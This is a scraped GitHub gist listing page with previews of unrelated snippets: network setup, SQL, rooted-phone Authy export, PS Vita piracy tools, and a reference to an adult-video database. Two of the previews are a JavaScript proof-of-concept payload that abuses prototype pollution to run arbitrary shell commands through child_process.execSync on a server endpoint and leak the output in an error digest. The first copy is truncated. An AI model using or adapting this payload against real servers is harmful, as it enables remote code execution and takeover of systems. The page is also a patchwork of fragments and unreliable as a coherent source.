Minimal D3D11 reference implementation: An uncluttered Direct3D 11 setup + basic rendering primer and API familiarizer. Complete, runnable Windows application contained in a single function and laid out in a linear, step-by-step fashion that should be easy to follow from the code alone. ~200 LOC. No modern C++, OOP or (other) obscuring cruft. View on YouTube
Discover gists
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Heavily inspired by https://haluk.github.io/posts-output/2020-10-19-linux/ | |
| # Replace <IFNAME> with wifi device name | |
| # Replace <IDENTITY> with student identity (i.e. <USERNAME>@ntnu.no) | |
| # Replace <PASSWORD> with user password | |
| nmcli con add \ | |
| type wifi \ | |
| ifname <IFNAME> \ | |
| con-name eduroam \ | |
| ssid eduroam \ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| CREATE EXTENSION ltree; | |
| CREATE TABLE test (path ltree); | |
| -- Top | |
| -- / | \ | |
| -- Science Hobbies Collections | |
| -- / | \ | |
| -- Astronomy Amateurs_Astronomy Pictures |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (async () => { | |
| // === CONFIGURATION === | |
| const targetUrl = "/namaste"; // The endpoint to hit (relative to current domain) | |
| console.log(`[*] Attempting to run command: ${cmd}`); | |
| // 1. Construct the malicious payload | |
| // This injects the command into a child_process.execSync call and throws the result in an error digest | |
| const payloadJson = `{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\\"then\\":\\"$B1337\\"}","_response":{"_prefix":"console.log('meowmeow')//","_formData":{"get":"$1:constructor:constructor"}}}`; | |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (async () => { | |
| // === CONFIGURATION === | |
| const cmd = "touch iWasHere"; // The command you want to run | |
| const targetUrl = "/namaste"; // The endpoint to hit (relative to current domain) | |
| console.log(`[*] Attempting to run command: ${cmd}`); | |
| // 1. Construct the malicious payload | |
| // This injects the command into a child_process.execSync call and throws the result in an error digest | |
| const payloadJson = `{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\\"then\\":\\"$B1337\\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('${cmd}').toString('base64');throw Object.assign(new Error('x'),{digest: res});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}`; |
It took me 3 days to pass the error The device does not meet the minimum integrity requirements.
Finally, I exported my Authy from my Android 14 phone on custom ROM.
- Phone: Realme GT2
- ROM: custom ROM PixelOS
- State: Root already
- Android: 14
- Integrity: MEETS_DEVICE_INTEGRITY
使用JAV金鸡儿奖官网附带的工具JAV SQL 查询器,可查询各种类别的JavDB TOP250影片:
及分年数据(存在部分重复影片,原始数据的问题):
Due to so many misinformation, false claims and confusion that goes around the web I've decided to make this quick comparison of all most known backup enabling tools, hackable vita firmwares and which one you should be using and why.
Date of last update: 13.01.2020
| NoNpDRM Rips | Vitamin / MaiDumpTool Dumps | |
|---|---|---|
| All original files untouched | ✅ | ❌ |
| Support Retail DLCs | ✅ | ❌ |
| Support Ripped (NoNpDRM) DLCs | ✅ | ❌ |
| Support Dumped (Vitamin/Mai) DLCs | ✅1 | ✅ |
Make sure there is at least one file in it (even just the README.md)
ssh-keygen -t rsa -C "[email protected]"
NewerOlder

